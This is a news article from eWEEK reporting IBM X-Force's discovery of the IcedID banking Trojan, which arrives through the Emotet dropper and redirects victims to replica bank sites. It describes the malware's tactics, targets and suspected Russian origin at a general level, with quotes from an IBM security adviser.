IcedID Banking Trojan Redirects Users to Fake Sites, IBM Reports

IBM researchers discover a new banking Trojan that is built with custom code, though it uses similar tactics to existing malware attacks.

Banking Trojan 2

The IBM X-Force research team has discovered a new banking Trojan, dubbed "IcedID," that is taking aim at global financial institutions.

The IcedID Trojan relies on the Emotet malware dropper to exploit a victim's system. IcedID then provides the Trojan payload, redirecting victims to an attacker site that is a replica of a real banking website. The IcedID Trojan attack has targeted banks, payment card providers and e-commerce sites in the United States, Canada and the UK.

"IBM X-Force monitors close to 300 million protected endpoints across the globe, detecting and mapping threat evolution close to real time," Limor Kessem, executive security adviser at IBM Security, told eWEEK. "X-Force research detected and analyzed IcedID as soon as it was identified in attempts to infect end users."

It's not clear how many victims IcedID has claimed or how widespread the distribution of the Trojan is. Kessem said X-Force detected IcedID very early after its launch, and so far the campaigns are still small, with the number of infections being limited. 

By using the Emotet dropper as a distribution mechanism, IcedID's authors have attempted to keep the malware under the radar, Kessem noted, adding that Emotet itself is usually delivered via malware spam (malspam), often concealed in productivity file attachments.

"After the user is first infected with Emotet, the latter is used as a covert tunnel through which other malware is delivered and executed on the endpoint," she said. "Aside from newly dropping IcedID, Emotet is known for its connection with a variety of malicious codes, most recently the QakBot banking Trojan that targets business banking in North America."


Among IcedID’s core capabilities is it redirects victims to an attacker-controlled site. Instead of using web injections on a bank's site, IcedID takes a victim to a page it serves from its own server and can communicate with the victim there, away from the bank's control. Kessem said the redirection pages are often difficult for regular users to identify.

"Redirection attacks are malware-facilitated operations in which the bank’s genuine site is an unwilling participant," she said. "The malware keeps a live connection to the genuine site and manipulates the fake session in a way that has it present the bank's true URL in the address bar."

IcedID does not directly exploit user systems; it is delivered into an already compromised endpoint that was first exploited by the Emotet dropper.

"To gain the initial foothold, Emotet uses malicious JavaScript in file macros in order to invoke a PowerShell script to fetch the payload from a remote server," Kessem said. "This process is initiated by unwitting users who are tricked into opening email attachments that carry concealed malcode."

Although IcedID uses tactics used in other banking Trojans, according to IBM X-Force's analysis, IcedID is custom code. It's not clear where IcedID came from or who wrote the code. Kessem warned that when it comes to cyber-crime activity, attribution is often a tricky concept as malware can be operated by different groups or subgroups, or be sold and shared. That said, IBM X-Force researchers do have some suspicions.

"According to an analysis of IcedID's infrastructure, the malware's main servers are hosted in Russia," Kessem said. "Judging by the company it keeps, IcedID is delivered by the same group that delivers QakBot and Dridex, both of which are also known to come from Russian-speaking regions."

Sean Michael Kerner is a senior editor at eWEEK and Follow him on Twitter @TechJournalist.

Sean Michael Kerner

Sean Michael Kerner

Sean Michael Kerner is an Internet consultant, strategist, and contributor to several leading IT business web sites.